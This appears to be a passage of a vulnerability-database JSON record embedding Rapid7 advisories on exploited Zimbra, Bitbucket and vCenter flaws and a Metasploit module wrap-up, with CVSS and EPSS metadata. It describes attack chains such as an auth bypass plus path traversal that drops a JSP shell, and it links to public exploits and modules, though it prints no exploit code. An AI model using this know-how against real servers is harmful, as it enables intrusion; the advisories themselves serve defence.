["TRENDMICROBLOG:B2CE0B51EC84664ADCCD67A2A0DF7033"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2022-26134", "UB:CVE-2022-30333"]}, {"type": "vmware", "idList": ["VMSA-2021-0002", "VMSA-2021-0020", "VMSA-2021-0020.1"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0", "WALLARMLAB:E69ED97E0B27F68EA2CE3BB7BA9FE681"]}, {"type": "zdt", "idList": ["1337DAY-ID-35863", "1337DAY-ID-35879", "1337DAY-ID-35912", "1337DAY-ID-36472", "1337DAY-ID-36874", "1337DAY-ID-37778", "1337DAY-ID-37781", "1337DAY-ID-37783", "1337DAY-ID-37894", "1337DAY-ID-37907", "1337DAY-ID-37925", "1337DAY-ID-37985"]}]}, "epss": [{"cve": "CVE-2021-21972", "epss": "0.973850000", "percentile": "0.998190000", "modified": "2023-03-19"}, {"cve": "CVE-2021-22005", "epss": "0.974180000", "percentile": "0.998580000", "modified": "2023-03-19"}, {"cve": "CVE-2022-26134", "epss": "0.975420000", "percentile": "0.999870000", "modified": "2023-03-19"}, {"cve": "CVE-2022-26138", "epss": "0.973890000", "percentile": "0.998230000", "modified": "2023-03-19"}, {"cve": "CVE-2022-27511", "epss": "0.001320000", "percentile": "0.464310000", "modified": "2023-03-19"}, {"cve": "CVE-2022-27924", "epss": "0.262330000", "percentile": "0.959750000", "modified": "2023-03-19"}, {"cve": "CVE-2022-27925", "epss": "0.970410000", "percentile": "0.995590000", "modified": "2023-03-19"}, {"cve": "CVE-2022-29499", "epss": "0.016040000", "percentile": "0.854240000", "modified": "2023-03-19"}, {"cve": "CVE-2022-30333", "epss": "0.854870000", "percentile": "0.979340000", "modified": "2023-03-19"}, {"cve": "CVE-2022-36804", "epss": "0.975590000", "percentile": "0.999940000", "modified": "2023-03-19"}, {"cve": "CVE-2022-37042", "epss": "0.974850000", "percentile": "0.999400000", "modified": "2023-03-19"}, {"cve": "CVE-2022-37393", "epss": "0.000530000", "percentile": "0.188290000", "modified": "2023-03-19"}], "vulnersScore": -0.2}, "_state": {"score": 1684015195, "dependencies": 1664381589, "epss": 1679305349}, "_internal": {"score_hash": "8f7bca4c5d993f1b2561a644faf1b39d"}}

{"rapid7blog": [{"lastseen": "2022-08-26T21:03:28", "description": "![Active Exploitation of Multiple Vulnerabilities in Zimbra Collaboration Suite](https://blog.rapid7.com/content/images/2022/08/zimbra-etr.jpg)\n\nOver the past few weeks, five different vulnerabilities affecting [Zimbra Collaboration Suite](<https://www.zimbra.com/>) have come to our attention, one of which is unpatched, and four of which are being actively and widely exploited in the wild by well-organized threat actors. We urge organizations who use Zimbra to patch to the **[latest version](<https://wiki.zimbra.com/wiki/Zimbra_Releases>)** on an urgent basis, and to upgrade future versions as quickly as possible once they are released.\n\n## Exploited RCE vulnerabilities\n\nThe following vulnerabilities can be used for remote code execution and are being [exploited in the wild](<https://www.cisa.gov/uscert/ncas/alerts/aa22-228a>).\n\n### CVE-2022-30333\n\n[CVE-2022-30333](<https://nvd.nist.gov/vuln/detail/CVE-2022-30333>) is a path traversal vulnerability in `unRAR`, Rarlab\u2019s command line utility for extracting RAR file archives. CVE-2022-30333 allows an attacker to write a file anywhere on the target file system as the user that executes `unrar`. Zimbra Collaboration Suite uses a vulnerable implementation of `unrar` (specifically, the `amavisd` component, which is used to inspect incoming emails for spam and malware). Zimbra addressed this issue in [9.0.0 patch 25](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25>) and [8.5.15 patch 32](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32>) by replacing `unrar` with `7z`.\n\nOur research team has a [full analysis of CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis?referrer=blog>) in AttackerKB. A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16796>) is also available. Note that the server **does not** necessarily need to be internet-facing to be exploited \u2014 it simply needs to receive a malicious email.\n\n### CVE-2022-27924\n\nCVE-2022-27924 is a blind Memcached injection vulnerability [first analyzed publicly](<https://blog.sonarsource.com/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/>) in June 2022. Successful exploitation allows an attacker to change arbitrary keys in the Memcached cache to arbitrary values. In the worst-case scenario, an attacker can steal a user\u2019s credentials when a user attempts to authenticate. Combined with [CVE-2022-27925](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>), an authenticated remote code execution vulnerability, and [CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis?referrer=blog>), a currently unpatched privilege escalation issue that was publicly disclosed [in October 2021](<https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/>), capturing a user\u2019s password can lead to remote code execution as the root user on an organization\u2019s email server, which frequently contains sensitive data.\n\nOur research team has a [full analysis of CVE-2022-27924](<https://attackerkb.com/topics/6vZw1iqYRY/cve-2022-27924/rapid7-analysis?referrer=blog>) in AttackerKB. Note that an attacker does need to know a username on the server in order to exploit CVE-2022-27924. According to Sonar, it is also possible to poison the cache for _any_ user by stacking multiple requests.\n\n### CVE-2022-27925\n\n[CVE-2022-27925](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>) is a directory traversal vulnerability in Zimbra Collaboration Suite Network Edition versions 8.8.15 and 9.0 that allows an authenticated user with administrator rights to upload arbitrary files to the system. (Note that Open Source Edition does not have that endpoint and is therefore not vulnerable.) On August 10, 2022, security firm [Volexity published findings](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) from multiple customer compromise investigations that indicated CVE-2022-27925 was being exploited in combination with a zero-day authentication bypass, now assigned CVE-2022-37042, that allowed attackers to leverage CVE-2022-27925 _without_ authentication.\n\n**Note:** Although the public advisories don't mention it, our testing indicated that Zimbra Collaboration Suite Network Edition (the paid edition) is vulnerable, and the Open Source Edition (free) is not (since it does not have the vulnerable `mboximport` endpoint). Vulnerable versions are:\n\n * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)\n * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)\n\nOur research team has a [full analysis of CVE-2022-27925](<https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis>) in AttackerKB.\n\n### CVE-2022-37042\n\nAs noted above, CVE-2022-37042 is a critical authentication bypass that arises from an incomplete fix for CVE-2022-27925. Zimbra patched CVE-2022-37042 in [9.0.0P26](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P26>) and [8.8.15P33](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P33>).\n\n## Unpatched privilege escalation CVE-2022-37393\n\nIn October of 2021, researcher Darren Martyn [published an exploit](<https://github.com/darrenmartyn/zimbra-slapper/>) for a zero-day [root privilege escalation vulnerability](<https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/>) in Zimbra Collaboration Suite. When successfully exploited, the vulnerability allows a user with a shell account as the `zimbra` user to escalate to root privileges. While this issue requires a local account on the Zimbra host, the previously mentioned vulnerabilities in this blog post offer plenty of opportunity to obtain it.\n\nOur research team tested the privilege escalation in combination with CVE-2022-30333 at the end of July 2022, as well as the fully patched version on August 17, 2022, and found that all versions of Zimbra were affected through at least 9.0.0 P26 and 8.8.15 P33. Rapid7 disclosed the vulnerability to Zimbra on July 21, 2022 and later assigned [CVE-2022-37393](<https://nvd.nist.gov/vuln/detail/CVE-2022-37393>) (still awaiting NVD analysis) to track it. A [full analysis of CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis?referrer=blog>) is available in AttackerKB. A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16807>) is also available.\n\n## Mitigation guidance\n\nWe strongly advise that all organizations who use Zimbra in their environments update to the latest available version (at time of writing, the latest versions available are 9.0.0 P26 and 8.8.15 P33) to remediate known remote code execution vectors. We also advise monitoring [Zimbra\u2019s release communications](<https://wiki.zimbra.com/wiki/Zimbra_Releases>) for future security updates, and patching on an urgent basis when new versions become available.\n\nThe AttackerKB analyses for [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis?referrer=blog>), [CVE-2022-27924](<https://attackerkb.com/topics/6vZw1iqYRY/cve-2022-27924/rapid7-analysis?referrer=blog>), [CVE-2022-27925](<https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis>), and [CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis?referrer=blog>) all include vulnerability details (including proofs of concept) and sample indicators of compromise (IOCs). Volexity\u2019s [blog](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) also has information on how to look for webshells dropped on Zimbra instances, such as comparing the list of JSP files on a Zimbra instance with those present by default in Zimbra installations. They have published [lists of valid JSP files included in Zimbra installations](<https://github.com/volexity/threat-intel/tree/main/2022/2022-08-10%20Mass%20exploitation%20of%20\$Un\$authenticated%20Zimbra%20RCE%20CVE-2022-27925>) for the latest version of 8.8.15 and of 9.0.0 (at time of writing).\n\nFinally, we recommend blocking internet traffic to Zimbra servers wherever possible and [configuring Zimbra to block external Memcached](<https://wiki.zimbra.com/wiki/Blocking_Memcached_Attack>), even on patched versions of Zimbra.\n\n## Rapid7 customers\n\nVulnerability checks for all five Zimbra CVEs are available via a content-only update as of August 18, 3pm ET.\n\n**InsightIDR:** Customers should look for alerts generated by InsightIDR\u2019s built-in detection rules from systems monitored by the Insight Agent. Alerts generated by the following rules may be indicative of related malicious activity:\n\n * Suspicious Process - Zimbra Collaboration Suite Webserver Spawns Script Interpreter\n * Suspicious Process - \u201cZimbra\u201d User Runs Shell or Script Interpreter\n\nThe Rapid7 MDR (Managed Detection & Response) SOC is monitoring for this activity and will escalate confirmed malicious activity to managed customers immediately.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[Active Exploitation of Atlassian\u2019s Questions for Confluence App CVE-2022-26138](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>)_\n * _[Exploitation of Mitel MiVoice Connect SA CVE-2022-29499](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>)_\n * _[CVE-2022-27511: Citrix ADM Remote Device Takeover](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>)_\n * _[Active Exploitation of Confluence CVE-2022-26134](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-17T12:55:18", "type": "rapid7blog", "title": "Active Exploitation of Multiple Vulnerabilities in Zimbra Collaboration Suite", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-26138", "CVE-2022-27511", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-29499", "CVE-2022-30333", "CVE-2022-37042", "CVE-2022-37393"], "modified": "2022-08-17T12:55:18", "id": "RAPID7BLOG:B294A0F514563C5FBF86F841910C60BE", "href": "https://blog.rapid7.com/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-26T16:04:26", "description": "![CVE-2022-36804: Easily Exploitable Vulnerability in Atlassian Bitbucket Server and Data Center](https://blog.rapid7.com/content/images/2022/09/atlassian-bitbucket-etr.jpg)\n\nOn August 24, 2022, Atlassian published [an advisory for Bitbucket Server and Data Center](<https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html>) alerting users to [CVE-2022-36804](<https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis/?utm_source=rapid7-blog&utm_medium=referral&utm_campaign=etr-atlassian-bitbucket>). The advisory reveals a command injection vulnerability in multiple API endpoints, which allows an attacker with access to a public repository or with **read permissions** to a private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. CVE-2022-36804 carries a CVSSv3 score of 9.8 and is easily exploitable. Rapid7\u2019s vulnerability research team has a [full technical analysis in AttackerKB](<https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis/?utm_source=rapid7-blog&utm_medium=referral&utm_campaign=etr-atlassian-bitbucket>), including how to use CVE-2022-36804 to create a simple reverse shell.\n\n[According to Shodan](<https://www.shodan.io/search?query=http.component%3A%22atlassian+bitbucket%22>), there are about 1,400 internet-facing servers, but it\u2019s not immediately obvious how many have a public repository. There are no public reports of exploitation in the wild as of September 20, 2022 (edit: see note below), but there has been strong interest in the vulnerability from researchers and exploit brokers, and there are now multiple public exploits available. Because the vulnerability is trivially exploitable and the patch is relatively simple to reverse- engineer, it\u2019s likely that targeted exploitation has already occurred in the wild. We expect to see larger-scale exploitation of CVE-2022-36804 soon.\n\n**Note:** Several threat intelligence sources [reported](<https://twitter.com/Shadowserver/status/1573300004072132608>) seeing exploitation attempts in the wild as of September 23, 2022.\n\n**Affected products:** \nBitbucket Server and Data Center 7.6 prior to 7.6.17 \nBitbucket Server and Data Center 7.17 prior to 7.17.10 \nBitbucket Server and Data Center 7.21 prior to 7.21.4 \nBitbucket Server and Data Center 8.0 prior to 8.0.3 \nBitbucket Server and Data Center 8.1 prior to 8.1.3 \nBitbucket Server and Data Center 8.2 prior to 8.2.2 \nBitbucket Server and Data Center 8.3 prior to 8.3.1\n\n## Mitigation guidance\n\nOrganizations that use Bitbucket Server and Data Center in their environments should patch as quickly as possible [using Atlassian's guide](<https://confluence.atlassian.com/bitbucketserver/bitbucket-server-upgrade-guide-776640551.html>), without waiting for a regular patch cycle to occur. Blocking network access to Bitbucket may also function as a temporary stop-gap solution, but this should not be a substitute for patching.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-36804 with an unauthenticated vulnerability check in the September 20, 2022 content release (`ContentOnly-content-1.1.2653-202209202050`).\n\nA detection rule, `Suspicious Process - Atlassian BitBucket Spawns Suspicious Commands`, was deployed to InsightIDR around 10am ET on September 22, 2022.\n\n## Updates\n\n**September 22, 2022 10:00AM ET** \nUpdated Rapid7 customers section to include information on a new IDR detection rule.\n\n**September 26, 2022 10:30 AM EDT** \nUpdated to reflect reports of exploitation in the wild.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[Active Exploitation of Multiple Vulnerabilities in Zimbra Collaboration Suite](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>)_\n * _[Active Exploitation of Atlassian\u2019s Questions for Confluence App CVE-2022-26138](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>)_\n * _[Exploitation of Mitel MiVoice Connect SA CVE-2022-29499](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>)_\n * _[CVE-2022-27511: Citrix ADM Remote Device Takeover](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-20T15:14:26", "type": "rapid7blog", "title": "CVE-2022-36804: Easily Exploitable Vulnerability in Atlassian Bitbucket Server and Data Center", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138", "CVE-2022-27511", "CVE-2022-29499", "CVE-2022-36804"], "modified": "2022-09-20T15:14:26", "id": "RAPID7BLOG:BCF3916E38EC7840E9BABBDD5431352B", "href": "https://blog.rapid7.com/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-26T22:02:56", "description": "## Zimbra Auth Bypass to Shell\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2022/08/metasploit-ascii-1-2-1.png)\n\n[Ron Bowes](<https://github.com/rbowes-r7>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/16922>) that targets multiple versions of Zimbra Collaboration Suite. The module leverages an authentication bypass (CVE-2022-37042) and a directory traversal vulnerability (CVE-2022-27925) to gain code execution as the `zimbra` user. The auth bypass functionality correctly checks for a valid session; however, the function that performs the check does not return and instead proceeds with execution. Because of this, an attacker only needs a valid account to get a shell. The directory traversal vulnerability lives in Zimbra\u2019s Zip file extraction functionality, enabling an attacker to write an arbitrary file to a web directory. Coupling those two vulnerabilities together, the module writes a JSP shell to the target via a POST request to the `/mboximport` endpoint. These vulnerabilities have been [reported](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) as exploited in the wild.\n\n## Another Deserialization Flaw in Exchange\n\nOur very own [zeroSteiner](<https://github.com/zeroSteiner>) submitted a new [module](<https://github.com/rapid7/metasploit-framework/pull/16915>) that exploits an authenticated .Net deserialization vulnerability in Microsoft Exchange. The vulnerability is due to a flaw in the `ChainedSerializationBinder`, a type validator for serialized data. Provided the attacker has credentials for at least a low-privileged user, this exploit will result in code execution as `NT AUTHORITY\\SYSTEM`.\n\n## New module content (2)\n\n * [Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)](<https://github.com/rapid7/metasploit-framework/pull/16922>) by Ron Bowes, Volexity Threat Research, and Yang_99's Nest, which exploits [CVE-2022-37042](<https://attackerkb.com/topics/BLL1VR8x6z/cve-2022-37042?referrer=blog>) \\- adds a module for CVE-2022-27925 and CVE-2022-37042. An attacker can exploit these issues to bypass authentication and then exploit a ZIP file path directory traversal vulnerability to gain RCE as the `zimbra` user.\n * [#16915](<https://github.com/rapid7/metasploit-framework/pull/16915>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- A new module has been added for CVE-2022-23277 which is another ChainedSerializationBinder bypass that results in RCE on vulnerable versions of Exchange prior to the March 8th 2022 security updates.\n\n## Enhancements and features (6)\n\n * [#16701](<https://github.com/rapid7/metasploit-framework/pull/16701>) from [jbaines-r7](<https://github.com/jbaines-r7>) \\- This improves the original `auxiliary/scanner/http/cisco_asa_asdm` scanner module by adding the ability to brute force the Cisco ASA's Clientless SSL VPN (webvpn) interface. The old module has been replaced by two new modules, this one and `auxiliary/scanner/http/cisco_asa_asdm_bruteforce`, which provide brute force of the Cisco ASA's ASDM interface directly.\n * [#16898](<https://github.com/rapid7/metasploit-framework/pull/16898>) from [bcoles](<https://github.com/bcoles>) \\- This adds a `Msf::Post::Windows::Accounts.domain_controller?` method and removes `is_dc?` methods from several modules in favor of using the new method.\n * [#16899](<https://github.com/rapid7/metasploit-framework/pull/16899>) from [bcoles](<https://github.com/bcoles>) \\- This removes the `domain_list_gen` Meterpreter script which has been replaced by the `post/windows/gather/enum_domain_group_users` post module.\n * [#16907](<https://github.com/rapid7/metasploit-framework/pull/16907>) from [bcoles](<https://github.com/bcoles>) \\- This improves the MS10-092 LPE exploit module. It uses the new task manager mixin, adds additional module metadata, and documentation.\n * [#16912](<https://github.com/rapid7/metasploit-framework/pull/16912>) from [bcoles](<https://github.com/bcoles>) \\- This removes the sound recorder Meterpreter script. It has been replaced by the record_mic post module.\n * [#16938](<https://github.com/rapid7/metasploit-framework/pull/16938>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The `ldap_query` module has been updated to allow the stored query templates to specify a Base DN prefix. Additionally, two ADCS-related queries that then use this to enumerate certificate authorities and certificate templates.\n\n## Bugs fixed (4)\n\n * [#16925](<https://github.com/rapid7/metasploit-framework/pull/16925>) from [rbowes-r7](<https://github.com/rbowes-r7>) \\- This fixes some issues with the payload generation in the UnRAR generic exploit module (CVE-2022-30333). This also adds the option to provide its own custom payload.\n * [#16931](<https://github.com/rapid7/metasploit-framework/pull/16931>) from [bcoles](<https://github.com/bcoles>) \\- A bug has been fixed in `Rex::Post::Meterpreter::Extensions::Stdapi::AudioOutput.play_file` where a channel would be opened before the path parameter was verified. This could lead to dangling channels being opened which would not be closed until Meterpreter was shut down.\n * [#16935](<https://github.com/rapid7/metasploit-framework/pull/16935>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes multiple SSH warnings when loading msfconsole on Ubuntu 22.04 or the latest Kali version.\n * [#16936](<https://github.com/rapid7/metasploit-framework/pull/16936>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a crash when using evasion modules when `mingw` is not present on the host machine for generating encrypted payloads.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.13...6.2.14](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-08-18T10%3A41%3A42-05%3A00..2022-08-25T17%3A06%3A18%2B01%3A00%22>)\n * [Full diff 6.2.13...6.2.14](<https://github.com/rapid7/metasploit-framework/compare/6.2.13...6.2.14>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-26T21:47:13", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-23277", "CVE-2022-27925", "CVE-2022-30333", "CVE-2022-37042"], "modified": "2022-08-26T21:47:13", "id": "RAPID7BLOG:559E0E8D2A3CCC9876788213E94E36A4", "href": "https://blog.rapid7.com/2022/08/26/metasploit-wrap-up-173/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-10-04T19:05:10", "description": "![Critical vCenter Server File Upload Vulnerability \$CVE-2021-22005\$](https://blog.rapid7.com/content/images/2021/09/vcenter-vuln.jpg)\n\n_See the Updates section at the end of this post for new information as it comes to light, including reports of exploitation._\n\n## Description\n\nOn Tuesday, September 21, 2021, VMware published [security advisory VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>), which includes details on CVE-2021-22005, a critical file upload vulnerability (CVSSv3 9.8) in vCenter Server that allows remote code execution (RCE) on the appliance. Successful exploitation of this vulnerability is achieved simply by uploading a specially crafted file via port 443 \u201cregardless of the configuration settings of vCenter Server.\u201d\n\nVMware has published an [FAQ](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq#section1>) outlining the details of this vulnerability and makes it clear that this should be patched \u201cimmediately.\u201d A workaround is also being provided by VMware \u2014 however, its use is not being recommended and should only be used as a temporary solution.\n\nYou can find Rapid7's vulnerability analysis on [AttackerKB](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis?referrer=blog>) which contains a root cause analysis and full RCE information.\n\n## Affected products\n\n * vCenter Server versions 6.7 and 7.0\n * Cloud Foundation (vCenter Server) 3.x, 4.x\n\n## Guidance\n\nWe echo VMware\u2019s advice that impacted servers should be patched right away. While there are currently no reports of exploitation, we expect this to quickly change within days \u2014 just as previous critical vCenter vulnerabilities did ([CVE-2021-21985](<https://www.rapid7.com/blog/post/2021/05/26/cve-2021-21985-vcenter-server-what-you-need-to-know/>), [CVE-2021-21972](<https://www.rapid7.com/blog/post/2021/02/24/vmware-vcenter-server-cve-2021-21972-remote-code-execution-vulnerability-what-you-need-to-know/>)). Additionally, Rapid7 recommends that, as a general practice, network access to critical organizational infrastructure only be allowed via VPN and never open to the public internet.\n\nWe will update this post as more information becomes available, such as information on exploitation.\n\n## Rapid7 customers\n\nA vulnerability check for CVE-2021-22005 is under development and will be available to InsightVM and Nexpose customers in an upcoming content release pending the QA process.\n\nIn the meantime, InsightVM customers can use [Query Builder](<https://docs.rapid7.com/insightvm/query-builder/>) to find assets that have vCenter Server installed by creating the following query: `software.description` `contains` `vCenter Server`. Rapid7 Nexpose customers can create a [Dynamic Asset Group](<https://docs.rapid7.com/nexpose/performing-filtered-asset-searches>) based on a filtered asset search for `Software name` `contains` `vCenter Server`.\n\n## Updates\n\n**[September 22, 2021]** \nAn InsightVM and Nexpose vulnerability check for CVE-2021-22005 is scheduled to be released on the afternoon (EST) of September 22, 2021.\n\nRapid7 Labs estimates there are over 2,700 vulnerable vCenter servers exposed to the public internet. This represents only a fraction of vulnerable servers, however, as attackers with existing network ingress will be tempted to utilize that access to take advantage of this vulnerability. ![Critical vCenter Server File Upload Vulnerability \$CVE-2021-22005\$](https://blog.rapid7.com/content/images/2021/09/vcenter09.png)\n\n**[September 23, 2021]** \nCVE-2021-22005 authenticated checks for InsightVM and Nexpose are available in content update 3594982882, released on September 23, 2021.\n\n**[September 24, 2021]** \nCVE-2021-22005 is now being [exploited](<https://twitter.com/bad_packets/status/1441465508348317702>) in the wild.\n\n**[September 29, 2021]** \nUpdated description to include a link to the Rapid7 analysis on [AttackerKB](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis?referrer=blog>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-21T19:55:35", "type": "rapid7blog", "title": "Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985", 